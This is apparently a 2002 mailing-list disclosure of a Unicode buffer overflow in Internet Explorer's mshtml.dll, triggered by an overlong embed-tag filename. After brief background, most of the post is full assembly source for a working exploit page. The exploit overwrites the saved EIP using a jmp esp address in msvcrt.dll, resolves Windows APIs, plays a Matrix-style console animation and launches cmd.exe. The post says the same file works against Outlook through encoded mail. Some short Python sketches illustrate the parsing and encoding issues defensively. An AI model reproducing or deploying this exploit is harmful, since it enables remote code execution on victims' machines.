Details and exploitation of buffer overflow in mshtml.dll (and a few side notes on Unicode overflows in general)

From: 3APA3A (3APA3Aat_private)
Date: Wed Feb 27 2002 - 05:15:32 PST

    The advisory was originally posted in [1-3] two weeks ago. I think
    enough time has passed to publish some details, especially since [4,5]
    contain enough information to rediscover the vulnerability.
    ERRor <error(at)> discovered that IE 5.5 and 6.0 in some cases crash on
     <embed src="filename.AAAAAAAAAA<lot of 'A's>">
    with EIP 0x41004100.
    The overflow occurs when IE concatenates the file extension to
    "Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
    with wcscat().
    There is another input validation bug in Internet Explorer: it fails to
    detect that a file has no extension. In this case it looks for a dot
    before the filename and treats everything after that dot as the
    extension. So it is possible to overflow the buffer with a long filename
    that has no extension at all.
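    The extension-parsing flaw described above can be illustrated with a
    small sketch. The post does not say exactly how IE searches for the dot,
    so "last dot anywhere in the string" is an assumption made here for
    illustration, and both function names and the example.com URL are
    hypothetical.

```python
import posixpath
from urllib.parse import urlsplit


def naive_extension(url: str) -> str:
    """Assumed flawed behaviour: take everything after the last dot in the
    whole string, even if that dot is not part of the filename."""
    dot = url.rfind(".")
    return url[dot:] if dot != -1 else ""


def careful_extension(url: str) -> str:
    """Look only at the final path component; empty if it has no dot."""
    filename = posixpath.basename(urlsplit(url).path)
    return posixpath.splitext(filename)[1]


# A long filename with no extension at all (hypothetical URL).
url = "http://www.example.com/files/" + "A" * 40

print(len(naive_extension(url)))     # length of ".com/files/AAAA..."
print(repr(careful_extension(url)))  # no extension found
```

    With the naive search the "extension" starts at the dot in the host name
    and carries the whole filename with it, which is why a filename without
    any dot can still feed an overlong string to the concatenation.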
    The rest of this paper is for vuln-dev :)
    This is the kind of Unicode buffer overflow that was discussed so much
    on Vuln-Dev some time ago. Usually we do not code or release exploits
    for "standard" holes like format strings or overflows; we only point out
    that a vulnerability is exploitable. The only reason for this paper is
    to show how easy this sort of bug is to exploit. We do not plan to
    release any exploits of this kind in the future.
    There are a few problems for anyone who wants to create an exploit:
    1.  All data is converted to Unicode, that is, 'A' (0x41) will be
    converted to the 16-bit value 0x0041 (bytes 41 00).
    2.  The address of the shellcode differs depending on the number of open
    Internet Explorer windows, the Windows and Internet Explorer versions,
    and the patches installed.
    3.  The offset of the saved EIP on the stack differs between Internet
    Explorer before and after IE5.5SP2.
    4.  A couple of small problems we will not describe, because leaving
    them out may help to stop a virus or a script kiddie with an exploit if
    one appears in the wild.
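    Point 1 can be checked with a few lines of Python. This is only a sketch
    of the byte pattern: it assumes the widening is equivalent to UTF-16LE
    encoding, and the helper names are hypothetical. It says nothing about
    the real stack layout inside mshtml.dll.

```python
import struct


def widen(text: str) -> bytes:
    """Widen ASCII text to 16-bit little-endian code units."""
    return text.encode("utf-16-le")


def dword_at(buf: bytes, offset: int) -> int:
    """Read a little-endian 32-bit value at the given byte offset."""
    return struct.unpack_from("<I", buf, offset)[0]


wide = widen("A" * 8)
print(wide[:4].hex())          # raw bytes of the first two characters
print(hex(dword_at(wide, 0)))  # dword read at an even byte offset
print(hex(dword_at(wide, 1)))  # dword read at an odd byte offset
```

    Read at an even offset the dword is 0x00410041; read at an odd offset it
    is 0x41004100, which matches the EIP value reported in the crash.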
    Now you can try to exploit this bug by yourself... I had a working
    exploit after half an hour without using any debugger or disassembler :)
    One of the first Unicode overflows found in the wild was the
    vulnerability in an IIS ISAPI filter found by eEye [6]. They failed to
    make a really working exploit, saying that exploiting this kind of bug
    is hard. The bug was successfully exploited by hsj and later by the
    authors of the CodeRed worm. This brings us to the fact: EXPLOITATION OF
    UNICODE OVERFLOWS IS EASY. There is an easy way to bypass the conversion
    of the shellcode to Unicode: it should be in Unicode already. This was
    the trick used by CodeRed (a wonderful analysis of CodeRed was made by
    Andrey Kolishak in [7]). I wrote about Unicode HTML in [8] (in fact [8]
    was released to prevent possible impact from this paper, but it did not
    succeed, because many filters still do not check Unicode HTML).
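    The filtering problem mentioned above can be sketched from the defensive
    side. The example below is a minimal illustration, not any real filter's
    code: it assumes a content filter that searches for a tag name, and the
    function names are hypothetical. It shows why a byte-level search misses
    a tag in a UTF-16 page and how decoding by byte order mark first avoids
    that.

```python
import codecs


def decode_html(raw: bytes) -> str:
    """Decode page bytes to text, honouring a leading byte order mark."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(codecs.BOM_UTF16_BE):
        return raw[2:].decode("utf-16-be", errors="replace")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[3:].decode("utf-8", errors="replace")
    # No BOM: fall back to a single-byte decoding that never fails.
    return raw.decode("latin-1")


def contains_tag(raw: bytes, tag: str) -> bool:
    """Search for an opening tag in the decoded text, not in raw bytes."""
    return ("<" + tag.lower()) in decode_html(raw).lower()


# A harmless UTF-16LE page containing only an <embed> tag.
page = codecs.BOM_UTF16_LE + '<embed src="x">'.encode("utf-16-le")

print(b"<embed" in page)            # naive byte search
print(contains_tag(page, "embed"))  # search after decoding
```

    The naive byte search fails because every ASCII character in the page is
    followed by a zero byte; the decoded search finds the tag.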
    Andrey pointed out an easy (and well-known) way to avoid the second
    problem, a hardcoded shellcode address. Instead of overwriting the saved
    EIP with the address of our shellcode we can use an indirect jump:
    overwrite EIP with the address of an instruction in the memory space of
    some DLL which will jump back to our code via ebp or esp (ebp may be
    used when exploiting format strings). We found jmp esp (FFE4) in all
    versions of kernel32.dll and in one version of msvcrt.dll
    (6.10.8924.0). This version of the DLL does not depend on Internet
    Explorer and is present in most installations of Windows NT 4.0 and
    Windows 2000 we checked (but never in Windows 95/98/ME/XP), so we used
    it.
    The third problem was solved by overwriting all possible EIPs, using a
    few no-ops and a
      call xxxx
      pop ebp
    combination to get the exact address of our shellcode.
    Since the exploit is in Unicode we do not have to care about '\0' bytes
    (only 0x0000 and 0xFFFF are prohibited, so we have to take care with
    calls and far jumps), so we wrote a large shellcode with visual effects.
    If you like it, you can download the full version of the dH &
    SECURITY.NNOV Matrix screensaver from

    The resulting HTML (it works with msvcrt.dll 6.10.8924.0 and does not
    depend on the mshtml.dll version, the program used or the Windows
    version) can be obtained from

    The same file (properly encoded to UTF-7, UTF-8, quoted-printable or
    base64) may be used to exploit Outlook Express/Outlook. (I've just
    noticed that under Windows 2000 the terminal window sometimes opens in
    the background and you need to switch to it. It's not good, but I won't
    bother to patch it :) ).
    Below is the source code for matrix.htm:
    -=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
    ;   matrix.asm - source code for matrix.htm
    ;   build:
    ;   tasm matrix.asm /m2
    ;   tlink matrix.obj, matrix.htm /t /3
    ;   Authors:
    ;     ERROR:    bug discovery
    ;     3APA3A:   idea and coding
    ;     OFFliner: matrix effects and undocumented Windows API
    ;   Thanx to Andrey Kolishak for indirect esp jump idea
    ;     you can obtain matrix screensaver from
    ;  eipjmp: overwrites saved EIP for all versions of
    ;          mshtml.dll
    ;  espjmp: gets control after jmp esp and calls code1
    ;  code1:  restores EIP from stack after call to ebp
    ;          does some actions and jumps to code2
    ;  code2:  does the rest of actions
    datap           equ (DataTable+080h)
    hKernel32       equ LoadL-datap
    cCur            equ StringTable-datap
    SetCCH          equ StringTable+4-datap
    GetSH           equ StringTable+8-datap
    Sleep           equ StringTable+12-datap
    WriteC          equ StringTable+16-datap
    AllocC          equ StringTable+20-datap
    SetCDM          equ StringTable+24-datap
    SetCTA          equ StringTable+28-datap
    SetCCI          equ StringTable+32-datap
    WinE            equ StringTable+36-datap
    ExitP           equ StringTable+40-datap
    hStdOut         equ StringTable+48-datap
    dwOldMode       equ cCur
    conCur          equ StringTable+52-datap
    cls             equ StringTable+56-datap
    DWNumChar       equ StringTable+60-datap
    RegHK           equ user-datap
    _faked  segment para public 'CODE' use32
           assume cs:_faked
    _faked   ends
    _main  segment para public 'DATA' use32
           assume cs:_main
            begin   db      0ffh,0feh               ;Unicode prefix
                    db      "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                    db      "s",0,"r",0,"c",0,"=",0,34,0
                    db      "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                    db      "w",0,"w",0,"w",0,".",0
                    db      "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                    db      "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                    db      "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                    db      "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                    db      "!(c)3APA3A"
                    db      22 dup(090h)
            pop ebp
            mov esp,ebx
            xor eax,eax
    dataoffset = DataTable - code2
    ebpdiff = 80h + dataoffset
            mov ax,ebpdiff
            add ebp,eax                     ;ebp points to data
            lea eax,[ebp+user-datap]
            push eax
            mov ebx,[ebp+LoadL-datap]
            mov eax,[ebx]
            mov [ebp+LoadL-datap],eax
            call eax                        ;LoadLibraryA("user32.dll")
            lea ebx,[ebp+reg-datap]
            push ebx
            push eax
            mov ebx,[ebp+GetPA-datap]
            mov eax,[ebx]
            mov [ebp+GetPA-datap],eax
            call eax                        ;GetProcAddress(.,"RegisterHotKey")
            mov [ebp+RegHK],eax
            lea edi,[ebp+rhk-datap]
            movzx esi,byte ptr[edi]
            inc edi
            xor eax,eax
            mov al,[edi]
            push eax
            inc edi
            mov al,[edi]
            push eax
            inc edi
            mov al,[edi]
            push eax
            xor eax,eax
            push eax
            call [ebp+RegHK]
            dec esi
            or esi,esi
            jnz LoopHotKey
            lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
            push eax
            call [ebp+LoadL-datap]          ;LoadLibraryA("kernel32.dll")
            mov [ebp+hKernel32],eax         ;hKernel32 = 
            lea eax, [ebp+SetCCH]
            mov [ebp+cCur],eax              ;*cCur = SetCCH
            lea edi,[ebp+funcnum-datap]
            movzx esi,byte ptr[edi]         ;esi=funcnum
            inc edi
            push edi
            push dword ptr [ebp+Hkernel32]
            call [ebp+GetPA-datap]          ;GetProcAddress(edi)
            mov ebx,[ebp+cCur]
            mov [ebx],eax                   ;save func address
            xor ecx,ecx
            mov cl,4
            add ebx,ecx
            mov [ebp+cCur],ebx              ;cCur+=4
            not ecx
            xor eax,eax
            repnz scasb                     ;find \0
            dec esi
            or esi,esi
            jnz LoopResolve
            call [ebp+AllocC]               ;AllocConsole()
            push eax                        ;nonzero if succeed
            xor eax,eax
            push eax
            call [ebp+SetCCH]               ;SetConsoleCtrlHandler(NULL,TRUE)
            xor eax,eax
            not eax
            sub al,0Ah
            push eax
            call [ebp+GetSH]                ;GetStdHandle(STD_OUTPUT_HANDLE)
            mov [ebp+hStdOut],eax           ;hStdOut=
            lea eax,[ebp+dwOldMode]
            push eax
            xor ebx,ebx
            inc ebx
            push ebx
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCDM]               ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
            xor ebx,ebx
            mov bl,0Ah
            push ebx
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCTA]               ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN) 
            xor ebx,ebx
            mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = 0
            mov bl, 100
            mov [ebp+ConCur],ebx            ;ConCur.dwSize = 100
            lea eax, [ebp+ConCur]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+SetCCI]               ;SetConsoleCursorInfo(hstdOut,&ConCur)
            xor eax,eax
            mov ax,1000
            push eax
            call[ebp+Sleep]                 ;Sleep(1000);
            xor ebx,ebx
            mov bl, string-datap
            mov eax,ebp
            add eax,ebx
            mov [ebp+cCur],eax              ;cCur = string
            mov eax,ebp
            mov bx,datap-empty_string
            sub eax,ebx
            mov [ebp+cls],eax               ;set address of empty_string
    LOOP1:                                  ;do do
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            inc eax
            push eax
            mov eax,[ebp+cCur]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+WriteC]               ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
            xor eax,eax
            mov al,100
            mov ecx,[ebp+cCur]
            mov bl,[ecx]
            sub bl,20
            jnz N1
            mov ax,400
    N1:     mov bl,[ecx]
            sub bl,8
            jnz N2
            mov ax,2100
    N2:     push eax
            call [ebp+Sleep]                ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
            mov ecx,[ebp+cCur]
            inc ecx
            mov [ebp+cCur],ecx              ;++cCur
            mov bl,[ecx]
            sub bl,9
            jnz LOOP1                       ;while(*cCur!='\t');
            call [ebp+cls]
            mov ecx,[ebp+cCur]
            inc ecx
            mov [ebp+cCur],ecx              ;++cCur
            mov bl,[ecx]
            sub bl,00Ah
            jnz LOOP1                       ;while(*cCur!='\n');
            inc ecx
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            mov al,18
            push eax
            push ecx
            push dword ptr [ebp+hStdOut]
            jmp code2
    codelength  = $ - begin
    neednoops = 1d4h - codelength
                    db neednoops dup(090h)
                    dd      78024e02h
                    dd      78024e02h
                    dd      78024e02h
                    dd      78024e02h
                    dw      9090h
                    dd      78024e02h       ;EIP for IE < 55SP2
                    db 18 dup(090h)
            xor eax,eax                     ;ESP comes here
            mov ax,0170h
            mov ebx,esp
            sub ebx,eax
            call ebx
            call [ebp+WriteC]
            xor eax,eax
            mov ax,4000
            push eax
            call [ebp+Sleep]
            call [ebp+cls]
            lea eax,[ebp+cmdexe-datap]
            push eax
            push eax
            call [ebp+WinE]
            xor eax,eax
            push eax
            call [ebp+ExitP]
            ; some code can be pasted here
            xor eax,eax
            mov ax,1000
            push eax
            call [ebp+Sleep]        ;Sleep(1000)
            xor eax,eax
            push eax
            lea ebx,[ebp+DWNumChar]
            push ebx
            mov al,30
            push eax
            lea eax,[ebp+empty-datap]
            push eax
            push dword ptr [ebp+hStdOut]
            call [ebp+WriteC]
            LoadL   dd      780330d0h       ;LoadLibraryA import table entry
            GetPA   dd      780330cch       ;GetProcAddress import table entry
                    db      "kernel32.dll",0
            funcnum db      10
                    db      "SetConsoleCtrlHandler",0
                    db      "GetStdHandle",0
                    db      "Sleep",0
                    db      "WriteConsoleA",0
                    db      "AllocConsole",0
                    db      "SetConsoleDisplayMode",0
                    db      "SetConsoleTextAttribute",0
                    db      "SetConsoleCursorInfo",0
                    db      "WinExec",0
                    db      "ExitProcess",0
            user    db      "user32.dll",0
            reg     db      "RegisterHotKey",0
            cmdexe  db      "cmd.exe",0
            rhk     db      5
                    db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
            empty   db      00dh,28 dup(020h),00dh,0
            string  db      00dh," Wake Up, Neo...",00dh,009h,0
                    db      00dh," The Matrix has you...",00dh,009h,0
                    db      00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                    db      00dh," Knock, knock...",00dh,0
            padding db      32
                    db      34,0,">",0,00ah
            copy    db      "(c) 2002 by 3APA3A, ERRor, OFFLiner"
    _main   ends
       end  start
    -=-=-=-=-=-=-=-=-  end matrix.asm  -=-=-=-=-=-=-=-=-
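    Two of the constants in the listing are built with register arithmetic,
    and the comments beside them can be checked by hand. The sketch below
    only replays that arithmetic. The helper name is hypothetical, and the
    named values are the documented Windows constants STD_OUTPUT_HANDLE
    (-11), FOREGROUND_GREEN (0x0002) and FOREGROUND_INTENSITY (0x0008).

```python
MASK32 = 0xFFFFFFFF


def sub_low_byte(eax: int, imm8: int) -> int:
    """Model 'sub al, imm8': only the low byte of eax changes."""
    al = ((eax & 0xFF) - imm8) & 0xFF
    return (eax & 0xFFFFFF00) | al


# xor eax,eax / not eax / sub al,0Ah
eax = 0
eax = ~eax & MASK32
eax = sub_low_byte(eax, 0x0A)

STD_OUTPUT_HANDLE = -11 & MASK32       # (DWORD)-11
FOREGROUND_GREEN = 0x0002
FOREGROUND_INTENSITY = 0x0008

print(hex(eax), hex(STD_OUTPUT_HANDLE))
print(hex(FOREGROUND_GREEN | FOREGROUND_INTENSITY))  # value loaded by mov bl,0Ah
```

    Both results agree with the comments in the listing: the value pushed
    for GetStdHandle is STD_OUTPUT_HANDLE, and 0Ah is bright green text.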
    [1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
    [2] Microsoft Security Bulletin MS02-005
    [3] CAN-2002-0022
    [4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
        Internet Explorer
    [5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
    [6] All versions of Microsoft Internet Information Services Remote
        buffer overflow (SYSTEM Level Access)
    [7] Andrey Kolishak, History of one vulnerability (in Russian)
    [8] Bypassing content filtering software
